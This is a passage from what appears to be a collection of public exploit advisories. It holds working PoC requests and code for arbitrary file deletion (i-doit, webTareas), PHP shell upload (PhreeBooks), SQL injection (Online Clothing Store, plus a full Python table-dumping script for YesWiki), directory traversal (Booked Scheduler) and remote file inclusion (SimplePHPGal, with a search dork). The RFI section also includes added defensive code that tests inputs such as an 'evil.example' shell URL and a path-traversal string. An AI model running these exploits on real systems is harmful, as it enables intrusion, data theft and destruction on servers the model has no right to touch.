        die("\n\n[+][-]" . $url . "/PyxisUaMenu.htm?sessionId=" . $key . "&MAINFRM(444,-1,591)# => Found\n\n");
    }
}
-
i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://www.i-doit.org/
# Software Link: https://sourceforge.net/projects/i-doit/
# Version: v1.14.1
# Tested on: Xampp
# Credit: İsmail BOZKURT
--------------------------------------------------------------------------------------------------
Vulnerable Module ---> Import Module
Vulnerable parameter ---> delete_import

-----------
PoC
-----------

POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ******************************
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/idoit/?moduleID=50&param=1&treeNode=501&mNavID=2
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.3
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-i-doit-Tenant-Id: 1
Content-Length: 30
DNT: 1
Connection: close
Cookie: PHPSESSID=bf21********************************68b8

delete_import=Type the filename, you want to delete from the server here
-
PhreeBooks ERP 5.2.5 - Remote Command Execution
# Exploit Title: PhreeBooks ERP 5.2.5 - Remote Command Execution
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: https://www.phreesoft.com/
# Software Link: https://sourceforge.net/projects/phreebooks/
# Version: v5.2.4, v5.2.5
# Tested on: Xampp
# Credit: İsmail BOZKURT
-------------------------------------------------------------------------------------
There are no file extension controls on Image Manager (5.2.4) and on Backup Restore.
If an authorized user is obtained, it is possible to run a malicious PHP file on the server.
--------------------------------------------------------------------------------------

One of the Vulnerable Files: (backup.php)
-----------------------------------------

RCE PoC (Upload Process)
--------------------------------------------------------------------------------------

POST /pblast/index.php?&p=bizuno/backup/uploadRestore HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 *********************
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pblast/index.php?&p=bizuno/backup/managerRestore
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------39525038724866743160620170
Content-Length: 231
DNT: 1
Connection: close
Cookie: **************************************************

-----------------------------39525038724866743160620170
Content-Disposition: form-data; name="fldFile"; filename="shell.php"
Content-Type: text/php

<? phpinfo(); ?>
-----------------------------39525038724866743160620170--

Shell directory:
-------------------------------
- http://localhost/pblast/myFiles/backups/shell.php
-
SimplePHPGal 0.7 - Remote File Inclusion
# Title: SimplePHPGal 0.7 - Remote File Inclusion
# Author: h4shur
# Date: 2020-05-05
# Vendor Homepage: https://johncaruso.ca
# Software Link: https://johncaruso.ca/phpGallery/
# Software Link: https://sourceforge.net/projects/simplephpgal/
# Tested on: Windows 10 & Google Chrome
# Category: Web Application Bugs
# Dork: intext:"Created with Simple PHP Photo Gallery" intext:"Created by John Caruso"

### Note:

* Another web application bug is the RFI bug, which can be very dangerous. It stands for Remote File Inclusion, and it directly executes foreign scripts on the server. This security hole is created by programmer errors, and you must be fluent in the programming language to secure and prevent this bug; you have to control the inputs of the application and use powerful firewalls.

* This bug is one of the most dangerous bugs, and the access that the intruder can gain using this bug is the execution of a shell script. In fact, by running a shell script, they will have relatively complete access to the target site's server. To explain it in text: the hacker executes the shell by giving a link to a shell script in txt format to the input of the vulnerable site.

* What's the solution? Check the file entered by the user against a list, and include it only if the file is in the list. Example:

<?php
$files = array('test.gif');
if (in_array($_GET['file'], $files)) {
    include($_GET['file']);
}
?>

* If you are a server administrator, turn off allow_url_fopen in the configuration file.

* Or do it with the ini_set command. Only for (RFI)

<?php
// allow_url_fopen is a PHP_INI_SYSTEM directive, so it takes effect only from
// php.ini or the server configuration; the original also had a stray trailing
// space in the directive name ('allow_url_fopen ').
ini_set('allow_url_fopen', 'Off');
?>

* We can use the strpos command to check that if the address starts with http://, the file will not be included (it can only block RFI)

<?php
$strpos = strpos($_GET['url'], 'http://');
// strpos() returns 0 when 'http://' is at the start of the string and !0 is
// true, so the original "if(!$strpos)" included exactly the URLs it meant to
// block; compare strictly against false instead.
if ($strpos === false) {
    include($_GET['url']);
}
?>

* Using str_replace we can clean the given address of the two characters "/" and ".".

<?php
$url = $_GET['url'];
$url = str_replace("/", "", $url);
$url = str_replace(".", "", $url);
include($url);
?>

### Poc :

[+] site.com/image.php?img= [ PAYLOAD ]
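A stricter form of the allowlist idea above, added here as an example; it is not part of h4shur's advisory or of SimplePHPGal's own code, and the gallery directory, the allowlist contents and the `resolve_gallery_include()` name are assumptions for the demo. It combines an exact allowlist match with a realpath() containment check, so "http://", "../" and NUL-byte inputs are rejected before anything reaches include().

```php
<?php
// Added example (not SimplePHPGal code): hardened resolver for an
// "image.php?img=" style include parameter.
//   1. an allowlist of names the page may include, and
//   2. a realpath() containment check that the resolved file lives under a
//      fixed gallery directory, which holds even if the allowlist is widened.
// $galleryDir and the allowlist entries are assumptions for this demo.

function resolve_gallery_include(string $requested, string $galleryDir, array $allowed): ?string
{
    // Reject empty names, directory separators, NUL bytes and any URL scheme outright.
    if ($requested === ''
        || strpbrk($requested, "/\\\0") !== false
        || preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested)) {
        return null;
    }
    // Exact, case-sensitive allowlist match (third argument = strict comparison).
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($galleryDir);
    $full = realpath($galleryDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;  // directory or file does not exist
    }
    // Containment: the resolved path must start with "<base>/".
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Demo against a temporary gallery directory constructed on the fly.
$galleryDir = sys_get_temp_dir() . '/gal_' . bin2hex(random_bytes(4));
mkdir($galleryDir);
file_put_contents($galleryDir . '/test.gif', 'GIF89a');
$allowed = ['test.gif'];

$cases = [
    'test.gif',                        // legitimate, on the allowlist
    'http://evil.example/shell.txt',   // remote include attempt
    '../../etc/passwd',                // local traversal attempt
    "test.gif\0.php",                  // NUL-byte truncation attempt
    'TEST.GIF',                        // case variant not on the list
];
foreach ($cases as $c) {
    $r = resolve_gallery_include($c, $galleryDir, $allowed);
    printf("%-35s => %s\n", addcslashes($c, "\0"), $r === null ? 'REJECTED' : 'OK: ' . basename($r));
}
// Only the first case is accepted; pass that result to include() instead of
// handing $_GET['img'] to include() directly.

unlink($galleryDir . '/test.gif');
rmdir($galleryDir);
```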
-
Online Clothing Store 1.0 - 'username' SQL Injection
# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection
# Date: 2020-05-05
# Exploit Author: Sushant Kamble
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
---------------------------------------------------------------------------------
# Parameter Vulnerable: username

# Injected Request

POST /online%20Clothing%20Store/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/online%20Clothing%20Store/
Cookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7
Upgrade-Insecure-Requests: 1

txtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login
-
Booked Scheduler 2.7.7 - Authenticated Directory Traversal
# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
# Date: 2020-05-03
# Author: Besim ALTINOK
# Vendor Homepage: https://www.bookedscheduler.com
# Software Link: https://sourceforge.net/projects/phpscheduleit/
# Version: v2.7.7
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description:
----------------------------------------------------------
Vulnerable Parameter: $tn
Vulnerable File: manage_email_templates.php

PoC
-----------

GET /booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/booked/Web/admin/manage_email_templates.php
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441; PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec
-
YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
# Date: 2020-04-25
# Exploit Author: coiffeur
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
# Version: YesWiki cercopitheque < 2020-04-18-1

import sys
import requests

DEBUG = 0


def usage():
    banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi
SYNOPSIS: python sqli_2020.04.18.1.py <URL> [OPTIONS]...
DESCRIPTION:
    -lt, list tables.
    -dt <TABLE>, dump table.
AUTHOR: coiffeur
"""
    print(banner)


def parse(text):
    # the injected concat() wraps the value in ABCAABBCC| ... |ABCAABBCC
    deli_l = 'ABCAABBCC|'
    deli_r = '|ABCAABBCC'
    if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
        print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
        exit(-1)
    start = text.find(deli_l) + len(deli_l)
    end = start + text[start::].find(deli_r)
    return text[start:end]


def render(elements):
    print(elements)


def get_count(t_type, table_name=None, column_name=None):
    if t_type == 'table':
        payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            data = parse(r.text)
    if t_type == 'column':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    if t_type == 'element':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    return int(data)


def list_tables():
    tables_count = get_count(t_type='table')
    print(f'[+] Tables found: {tables_count}')
    tables = []
    for i in range(0, tables_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            table = parse(r.text)
            print(f'\t{table}')
            tables.append(table)
    return tables


def list_columns(table_name):
    columns_count = get_count(t_type='column', table_name=table_name)
    print(f'[+] Columns found: {columns_count}')
    columns = []
    for i in range(0, columns_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            column = parse(r.text)
            if DEBUG > 0:
                print(f'\t{column}')
            columns.append(column)
    return columns


def dump_table(name):
    columns = list_columns(name)
    elements = [None] * len(columns)
    for i in range(0, len(columns)):
        elements_count = get_count(t_type='element', table_name=name, column_name=columns[i])
        if DEBUG > 0:
            print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
        element = []
        for j in range(0, elements_count):
            payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
            if DEBUG > 1:
                print(f'[DEBUG] {payload}')
            r = requests.get(url=f'{sys.argv[1]}{payload}')
            if r.status_code == 200:
                element.append(parse(r.text))
                if DEBUG > 0:
                    print(f'\t{element[-1]}')
        elements[i] = element
    render(elements)
    return elements


def main():
    if len(sys.argv) < 3:
        usage()  # usage() prints the banner itself; the original print(usage()) also echoed "None"
        exit(-1)
    if sys.argv[2] == '-lt':
        list_tables()
    if sys.argv[2] == '-dt':
        dump_table(sys.argv[3])


if __name__ == "__main__":
    main()
-
webTareas 2.0.p8 - Arbitrary File Deletion
# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
# Software Link: https://sourceforge.net/projects/webtareas/files/
# Version: v2.0.p8
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description:
--------------------------------------------------------------------------------------
- print_layout.php is vulnerable. When you send the PoC to the server and the file does not exist on the server, you see this error message:

<br /> <b>Warning</b>: unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip): No such file or directory in <b>/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php</b> on line <b>1303</b><br />

- So here you can delete files with the unlink function.
- And I did try again with another file; I deleted it from the server.
--------------------------------------------------------------------------------------------

Arbitrary File Deletion PoC
---------------------------------------------------------------------------------------

POST /webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1
Content-Type: multipart/form-data; boundary=---------------------------3678767312987982041084647942
Content-Length: 882
DNT: 1
Connection: close
Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730; PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191
Upgrade-Insecure-Requests: 1

-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="action"

edit
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="desc"

<p>tester</p>
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="attnam1"


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="atttmp1"

--add the delete file name here--
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="sp"


-----------------------------3678767312987982041084647942--